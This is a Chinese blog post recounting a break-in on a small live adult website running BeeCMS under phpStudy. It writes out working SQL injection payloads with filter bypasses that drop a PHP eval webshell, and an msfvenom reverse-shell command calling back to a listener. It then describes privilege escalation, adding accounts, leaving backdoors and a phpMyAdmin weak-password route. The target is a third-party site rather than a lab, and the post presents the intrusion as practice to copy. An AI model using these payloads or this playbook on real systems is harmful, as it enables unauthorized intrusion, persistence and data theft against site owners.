记一次小黄站渗透过程,实操!

简介: 记一次小黄站渗透过程,实操!


# 前言

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

#  渗透过程

无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞


这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php


通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入


可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过


发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以。

方法一

1、通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点
2、一把梭,发现并没有,使用脚本也没有绕过

方法二

1、通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过。

2、对shell部分进行编码

3、写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。ps:这里的写入路径纯属盲猜,运气好,默认目录

4、用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲


char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#


一样成功写入

1、写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下

2、md5解密,wocao,成功登陆,然后就是后台找上传了

# 后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去


方法一

1、通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听


2、不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1、上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2、访问大马


3、这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。

4、创建admin权限账号之后,登陆服务器


# 其他发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell。


# 总结

1、前台sql注入获取用户名密码,进入后台找上传2、SQL注入语句写入一句话3、phpmyadmin一句话getshell4、上传大马提权

至此,渗透结束。

相关文章
|
1月前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
|
1月前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9-2):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
|
2月前
|
监控 安全 数据库
用PageAdminCMS的网站需要经历几个步骤?
搭建基于PageAdminCMS的网站需经安装、配置环境、创建内容及管理等步骤。首先从官网下载并安装PageAdminCMS,解压上传文件至服务器,访问安装脚本,同意许可协议,检测环境,配置数据库信息,初始化管理员账号完成安装。随后配置网站基本信息、栏目、SEO及插件。接着创建文章、上传图片。最后监控网站运行状态,定期更新内容、备份数据及加强安全防护。参考官方文档或社区可解决具体问题。
|
6月前
|
移动开发 小程序 前端开发
技术经验解读:一个简单抓取糗事百科糗事的小程序
技术经验解读:一个简单抓取糗事百科糗事的小程序
|
7月前
|
Python
【python学习小案例】提升兴趣之模拟系统入侵,2024年最新面试阿里运营一般问什么
【python学习小案例】提升兴趣之模拟系统入侵,2024年最新面试阿里运营一般问什么
|
7月前
|
开发框架 安全 .NET
【攻防利器】Dirsearch 扫描工具
【攻防利器】Dirsearch 扫描工具
|
存储 安全 Shell
网络安全实验十三 渗透测试项目
网络安全实验十三 渗透测试项目
247 0
网络安全实验十三 渗透测试项目
|
SQL 安全 前端开发
新手学习渗透测试常规思路
2017黑客新手工具系列集合附链接 - 知乎专栏|这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样;但是在这个过程中, 思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧知识)但不是道从何挖起岂不是悲哀。
154 0
|
安全 数据安全/隐私保护
网站渗透思路总结
网站渗透思路总结
120 0
下一篇
DataWorks